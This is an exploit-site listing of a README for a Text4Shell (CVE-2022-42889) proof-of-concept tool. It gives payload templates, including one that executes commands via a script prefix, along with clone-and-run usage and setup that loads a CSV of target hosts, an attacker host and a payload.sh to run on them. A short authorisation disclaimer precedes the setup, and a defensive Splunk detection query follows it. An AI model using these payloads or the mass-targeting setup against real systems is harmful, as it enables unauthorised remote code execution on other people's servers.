## https://sploitus.com/exploit?id=C35BF4B6-7E2E-5B72-89B5-5978635A2AFF
# CVE-2022-42889 PoC
Text4Shell PoC Exploit, with ability to set custom payloads.
## Payload
```
“${prefix:engine:input}”
Prefix available - “script”, “dns”, “url”
${script:name} ex - ${script:javascript:java.lang.Runtime.getRuntime().exec('whoami')}
${url:name} ex - ${url:UTF-8:https://domain.tld}
${dns:name} ex - ${dns:address|domain.tld}
```
## Intended Use
Usage of this script is limited to personnel who are authorised to run the payload on the target hosts for vulnerability patching purposes only. Prior to running this script, ensure you are authorised.
## Usage
```
git clone https://github.com/west-wind/CVE-2022-42889.git
python poc-cve-2022-42889.py
```
## Getting Started
This POC expects to receive all targets in a CSV file titled --> **allTargets.csv** with one column titled --> **targets**, containing all the targets that need to be scanned ex., http://12.23.45.67:9099 or http://spark.domain.com. The / will be added by the script.
Enter the payload to be executed on the target in the **POC.conf** file.
Your host in --> **yourHostHere** http://my_domain_here.com
Your payload in --> **yourPayloadHere** payload.sh
Made for research purposes.
## Detection Splunk Query
```
index=web sourcetype IN (nginx, waf_logs)
| eval actual=urldecode(_raw)
| rex field=actual "(?<payloadIdentified>\$\{(script|dns|url)\:[^\"]*)" max_match=0
| where isnotnull(payloadIdentified)
| table _time src_ip dest payloadIdentified status request url user_agent referrer
```
## Patching & References
[NIST NVD](https://nvd.nist.gov/vuln/detail/CVE-2022-42889)
[Sysdig Blog](https://sysdig.com/blog/cve-2022-42889-text4shell/)